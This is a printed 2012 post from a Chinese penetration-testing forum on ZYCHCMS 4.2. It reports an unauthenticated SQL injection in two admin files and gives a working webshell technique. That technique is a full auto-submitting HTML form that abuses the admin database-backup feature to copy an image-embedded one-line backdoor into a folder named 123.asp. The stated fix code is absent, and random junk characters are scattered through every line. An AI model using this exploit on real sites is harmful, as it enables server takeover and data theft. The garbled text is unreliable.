中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

, W  b: x8 i# F! y6 v# s2 D% _% L& j/ H# M4 z( ^" @
" C* Y% H9 B& Q  m
  h/ `8 W0 b2 X5 s( [" ]
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
9 f( H) E, k! \+ R) Z! _& w; Z" N" [ ①SQL注射漏洞9 t0 t0 Y: F) }' T- d5 s+ i
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp5 C! C# z* S0 J& M7 _8 }
漏洞原因:未过滤
+ n% k# W% t- z/ ` 漏洞代码:
) r; F* P+ X  q& u# g3 f 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
) g1 W. j$ I3 m; g% ~ 修复方法:在文件开头加入代码
, h9 c1 \' H8 I+ e) i/ d
" T2 ?6 ~( L1 J7 {  y
, U1 K% |, W! M, U' w; ]②后台拿WBSHELL
% D* N% @+ x0 n) T7 E8 n3 R 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
: f3 T1 h2 x4 h/ f 这里在网上找了一个,改了下,将就着用。( ?+ b  {8 S# c) ~1 W
以下是代码本地提交代码9 A4 d# `0 \' ~9 _

7 m( d$ o9 V( J, O% a9 S$ N9 p" b& ?) G) [2 [" `! O7 B
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
' V& m* Z. M% F1 t; N# |" ]+ j( c: L5 ` <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
5 S/ t) b( V6 q  H( U9 e <tr>
+ O- R) k+ ]5 F6 F$ h6 N <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>, b9 j+ c' z1 j3 l
</tr>( R- s- S' O# V! G8 s$ M) ~
<tr>
0 u/ w' H  B6 x- O! X. T6 f! h <td bgcolor=”#FFFFFF”><span class=”back_southidc”>$ C& f  E0 f% o$ e; e+ L9 J% F5 v; R0 ]
</span>
# O) Q3 p9 w& v3 h1 L) o <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >- Q9 E1 M& A: F6 t, [& L4 E
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
# J- e4 H9 B" I' I/ A7 E' p <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>4 e+ n2 q7 L+ e( z3 E: o9 G
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d& M  x# c: G8 a( o
<div align=”left”>. C9 ?7 c4 T: `( T* n
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />) k1 `! M$ Q+ }! n
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>/ \! ]- T- @; ~. P$ K
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
3 W7 ^7 l9 L9 B' v </div></td>
8 G, d0 \, A: P! { </tr>& V( K& f# {; o, ]3 @" h
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>9 ]0 E, K$ Y8 l* M5 F" f  L& |
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>6 M5 B( k6 U4 f
<td class=”td”><div align=”left”>
' v* @/ z! ?' W. F. ^, I0 ^ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />( S8 k6 d( ^6 F8 _  z! D! A
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
, F/ ~) f* [( M3 Q- |6 N </tr>: C4 [% o3 ^% D& \9 p# X
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
* \- X0 X/ r0 o- H <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>3 h, s! ^! d' \. @$ F" m, o3 J" W  o8 Q
<td class=”td”><div align=”left”>
+ B* ?9 S6 B' f <input type=”submit” value=”确定备份” class=”btn”
6 z7 Y( d# q. g/ g. ~' G </div></td>" j: n7 b, r8 L1 S0 f! k* H2 b
</tr>
( l0 h9 M! E% l! ~' q </table></td></tr></form>
7 Q8 `- z. y: R- N1 { </table>
9 w2 }1 l4 w( v* t, v) L6 m# ~ </td>
' l) e6 J2 u& V0 }0 A" y" f2 `% L </tr>6 O- |) M3 ?- T5 x& X
</table>
/ T& L* ~9 N% j% \' z <script>8 X9 |- {. }2 x  M) r) Q' P. ?! G
document.all.add.submit();
3 F  u1 q* f( n$ Z. e6 Y9 U </script>0 ~; d. B# y7 _9 M

  E" W7 u( `! U4 ?0 |
0 b! m6 F. ?1 }' \, J0 N/ @& H, Q- P" j* w" }/ \
9 B) W0 ]9 e" h& K
: ^0 M+ e. o  v
: E! ?2 i* V; V  p. e  F) F

' g3 O- }& f0 G& U/ `. g2 S" x
' Z  n' Q1 c% N7 f, A( F6 N' f8 h' J1 F+ R' K+ d% f
, w5 C1 r$ o' V6 K6 _8 Q/ U' o





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2